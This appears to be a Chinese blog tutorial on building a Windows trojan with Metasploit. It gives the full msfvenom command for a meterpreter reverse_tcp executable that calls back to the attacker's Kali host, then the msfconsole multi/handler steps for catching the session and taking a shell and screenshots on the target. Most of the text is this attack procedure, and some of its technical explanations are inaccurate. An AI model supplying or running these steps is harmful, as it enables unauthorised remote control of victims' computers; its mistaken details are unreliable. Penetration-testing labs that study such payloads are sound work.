系统:kali,ip:192.168.43.16

所有需要输入的命令均在<     >中

打开终端;

使用<ifconfig>查看自己的ip

Metaploit木马制作(无免杀毒)

使用命令生成木马程序

Metaploit木马制作(无免杀毒)

<msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=192.168.43.16 LPORT=4444 -f exe > ks.exe>

windows/meterpreter/reverse_tcp(利用windows/meterpreter/reverse_tcp漏洞)

-e x86/shikata_ga_nai(靶机win10是64位,所以应选择对应的编码格式否则,可执行文件再次打开时会出现错误)

 -i 5 (代表编码次数为5次)

-b '0x00' (避免出现的值)

LHOST=192.168.43.16 (设置本机也就是kali的ip)

 LPORT=4444(设置端口,因为默认端口为4444所以我也填写的4444)

-f exe (生成exe的可执行文件)

>ks.exe(生成的文件名为ks.exe)

Metaploit木马制作(无免杀毒)

此处可以看到生成的文件有7KB左右大小

下一步要找到生成的文件,可以使用ls查看当前目录,找到目标文件<ls>

Metaploit木马制作(无免杀毒)

 

打开metaploit,msfconsole

<msfconsole>

Metaploit木马制作(无免杀毒)

打开监听模块

<use multi/handler>

Metaploit木马制作(无免杀毒)

加载一枚payload,

<set payload windows/meterpreter/reverse_tcp>

Metaploit木马制作(无免杀毒)

可以使用show options查看需要设置的参数

<show options>

Metaploit木马制作(无免杀毒)

可以看到,我们需要设置lhost

set lhost 192.168.43.16(此处为kali的ip)

<set lhost 192.168.43.16>

Metaploit木马制作(无免杀毒)

运行监听模块

<exploit>

Metaploit木马制作(无免杀毒)

此时,只要在靶机中运行木马程序,就会反弹会话,使用shell命令拿到shell(出现metepreter就表示已经反弹会话了)

Metaploit木马制作(无免杀毒)

此时可以看到已经进入目标主机,可以打开目标主机的命令操作目标主机,也可以在meterpreter会话端进行各种操作,(例如screenshot截取目标主机此时屏幕),后面会再搜索一下meterpreter会话端的命令进行总结。

 

相关文章:

猜你喜欢
相关资源
相似解决方案